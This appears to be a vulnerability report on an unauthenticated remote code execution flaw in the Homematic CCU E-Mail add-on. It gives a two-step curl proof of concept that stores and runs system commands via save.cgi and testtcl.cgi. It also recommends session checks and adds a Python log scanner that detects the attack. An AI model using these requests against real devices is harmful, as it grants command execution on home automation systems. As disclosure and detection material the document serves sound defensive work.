Just in case the E-Mail AddOn is a popular installed software, it can be used by an unauthenticated attacker with access to the web interface for any Remote Code Execution on Homematic CCU.
Otherwise such calls are possible.
Step 1 creating the payload:

```
curl -X POST -i 'http://192.168.4.129/addons/email/save.cgi?userScript' --data '
load tclrega.so
array set values [rega_script {
var x=system.Exec("sleep 4;");
var x=system.Exec("/bin/touch /tmp/testfile1;");
var x=dom.GetObject("CUxD.CUX2801001:1.CMD_EXEC").State("/bin/touch /tmp/testfile2");
}]'
```

Step 2 executing the payload:

```
curl -X GET -i 'http://192.168.4.129/addons/email/testtcl.cgi'
```
You may add a login session validation to all CGI scripts as shown in PR homematic-community/XML-API#31 for XML-API.
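An added example, not part of the original issue and not the add-on's own code: it scans web access logs for the two requests shown in the report arriving without a session, and flags the write followed by the run from the same client. It assumes an access log in Common Log Format (from the web server or a reverse proxy in front of it) and that authenticated WebUI requests carry a non-empty `sid` query parameter; the sample lines, client addresses and the five-minute window are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in Common Log Format; client IPs, times and the sid value are invented.
SAMPLE_LOG = """\
192.168.4.50 - - [12/Mar/2019:10:00:01 +0100] "POST /addons/email/save.cgi?userScript&sid=@AbCdEf1234@ HTTP/1.1" 200 17
192.168.4.77 - - [12/Mar/2019:10:05:10 +0100] "POST /addons/email/save.cgi?userScript HTTP/1.1" 200 17
192.168.4.77 - - [12/Mar/2019:10:05:12 +0100] "GET /addons/email/testtcl.cgi HTTP/1.1" 200 64
192.168.4.90 - - [12/Mar/2019:11:30:00 +0100] "GET /addons/email/testtcl.cgi HTTP/1.1" 200 64
"""

LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*"')
ADDON_PREFIX = "/addons/email/"   # add-on path shown in the report
WINDOW = timedelta(minutes=5)     # assumed correlation window

def parse(log_text):
    """Yield (ip, time, method, path, query parameters) for each parsable line."""
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            path, _, query = m["url"].partition("?")
            yield m["ip"], ts, m["method"], path, query.split("&")

def find_alerts(log_text):
    """Return (kind, client_ip, path) tuples for sessionless add-on requests."""
    alerts, last_write = [], {}
    for ip, ts, method, path, params in parse(log_text):
        if not path.startswith(ADDON_PREFIX):
            continue
        # Assumption: an authenticated WebUI call carries a non-empty sid parameter.
        # A sid in the URL does not prove the session is valid; its absence is the signal.
        if any(p.startswith("sid=") and len(p) > 4 for p in params):
            continue
        alerts.append(("sessionless-request", ip, path))
        if method == "POST" and path.endswith("/save.cgi") and "userScript" in params:
            last_write[ip] = ts  # remember when this client last stored a user script
        elif path.endswith("/testtcl.cgi") and ip in last_write:
            if timedelta(0) <= ts - last_write[ip] <= WINDOW:
                alerts.append(("script-write-then-run", ip, path))
    return alerts

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_LOG):
        print(alert)
```
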